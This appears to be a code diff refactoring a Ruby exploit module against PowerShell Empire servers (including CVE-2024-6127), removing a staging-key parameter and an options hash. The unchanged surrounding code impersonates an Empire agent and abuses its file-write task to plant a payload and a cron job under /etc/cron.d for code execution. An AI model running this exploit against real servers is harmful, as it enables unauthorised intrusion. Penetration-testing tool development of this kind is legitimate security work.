@@ -199,12 +199,11 @@ def get_staging_key
199199 @staging_key
200200 end
201201
202- def write_file ( path , data , session_id , session_key , opts )
202+ def write_file ( path , data , session_id , session_key , server_epoch )
203203 if datastore [ 'CVE' ] == 'CVE-2024-6127'
204- write_file_cve_2024_6127 ( path , data , session_id , session_key , opts [ :staging_key ] )
204+ write_file_cve_2024_6127 ( path , data , session_id , session_key )
205205 return
206206 end
207- server_epoch = opts [ :server_epoch ]
208207
209208 # target_url.path default traffic profile for empire agent communication
210209 # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
@@ -261,7 +260,7 @@ def exploit
261260 # This stage is unnecessary for our purposes.
262261 session_id = SecureRandom . alphanumeric ( 8 ) . upcase
263262 dummy = SecureRandom . alphanumeric ( 8 )
264- send_data_to_stage ( @staging_key , dummy , @staging_key , STAGE0 , session_id )
263+ send_data_to_stage ( @staging_key , dummy , STAGE0 , session_id )
265264
266265 # stage1
267266 dh = OpenSSL ::PKey ::DH . new (
@@ -277,7 +276,7 @@ def exploit
277276 end
278277 private_key = dh . priv_key . to_i
279278 public_key = dh . pub_key . to_s
280- res = send_data_to_stage ( @staging_key , public_key , @staging_key , STAGE1 , session_id )
279+ res = send_data_to_stage ( @staging_key , public_key , STAGE1 , session_id )
281280 fail_with ( Failure ::Unknown , 'Failed to send the key to STAGE1' ) unless res && res . code == 200
282281 vprint_good ( 'Successfully sent the key to STAGE1' )
283282
@@ -299,11 +298,11 @@ def exploit
299298
300299 # stage2
301300 sysinfo = "#{ nonce + 1 } #{ datastore [ 'RHOSTS' ] } #{ datastore [ 'RPORT' ] } . encode ( 'UTF-8' )
302- res = send_data_to_stage ( session_key , sysinfo , @staging_key , STAGE2 , session_id )
301+ res = send_data_to_stage ( session_key , sysinfo , STAGE2 , session_id )
303302 fail_with ( Failure ::Unknown , 'Failed to communicate with STAGE2' ) unless res && res . code == 200
304303 aes_decrypt ( session_key , res . body )
305304
306- opts = { staging_key : @staging_key }
305+ server_epoch = nil
307306 log_path = "/var/lib/powershell-empire/empire/server/downloads/#{ session_id }
308307
309308 else
@@ -327,7 +326,6 @@ def exploit
327326 session_key = body [ 10 ..]
328327 print_good ( 'Successfully negotiated an artificial Empire agent' )
329328
330- opts = { server_epoch : server_epoch }
331329 log_path = '/agent.log'
332330
333331 end
@@ -347,12 +345,12 @@ def exploit
347345 end
348346
349347 print_status ( "Writing payload to #{ payload_path } )
350- write_file ( payload_path , payload_data , session_id , session_key , opts )
348+ write_file ( payload_path , payload_data , session_id , session_key , server_epoch )
351349
352350 cron_path = '/etc/cron.d/' + rand_text_alpha ( 8 )
353351 print_status ( "Writing cron job to #{ cron_path } )
354352
355- write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , opts )
353+ write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , server_epoch )
356354 print_status ( 'Waiting for cron job to run, can take up to 60 seconds' )
357355
358356 register_files_for_cleanup ( cron_path )
@@ -362,10 +360,10 @@ def exploit
362360 register_files_for_cleanup ( log_path )
363361 end
364362
365- def build_routing_packet ( staging_key , meta = 0 , enc_data = '' . b , session_id = '00000000' )
363+ def build_routing_packet ( meta = 0 , enc_data = '' . b , session_id = '00000000' )
366364 data = session_id + [ 2 , meta , 0 , enc_data . bytes . length ] . pack ( 'C2SL' )
367365 rc4_iv = SecureRandom . random_bytes ( 4 )
368- key = rc4_iv + staging_key
366+ key = rc4_iv + @ staging_key
369367 rc4_enc_data = Rex ::Crypto . rc4 ( key , data )
370368 rc4_iv + rc4_enc_data + enc_data
371369 end
@@ -425,7 +423,7 @@ def to_bytes(num, length = 1, little_endian: false)
425423 bytes_array . pack ( 'C*' )
426424 end
427425
428- def write_file_cve_2024_6127 ( path , data , session_id , session_key , staging_key )
426+ def write_file_cve_2024_6127 ( path , data , session_id , session_key )
429427 path = path . split ( '/' ) . join ( '\\' )
430428 packet = build_response_packet (
431429 TASK_DOWNLOAD ,
@@ -436,12 +434,12 @@ def write_file_cve_2024_6127(path, data, session_id, session_key, staging_key)
436434 compress ( data )
437435 ] . join ( '|' )
438436 )
439- send_data_to_stage ( session_key , packet , staging_key , RESULT_POST , session_id )
437+ send_data_to_stage ( session_key , packet , RESULT_POST , session_id )
440438 end
441439
442- def send_data_to_stage ( session_key , packet , staging_key , task_id , session_id )
440+ def send_data_to_stage ( session_key , packet , task_id , session_id )
443441 enc_packet = aes_encrypt_then_hmac ( session_key , packet )
444- data = build_routing_packet ( staging_key , task_id , enc_packet , session_id )
442+ data = build_routing_packet ( task_id , enc_packet , session_id )
445443 res = send_request_cgi ( {
446444 'data' => data ,
447445 'method' => 'POST' ,
0 commit comments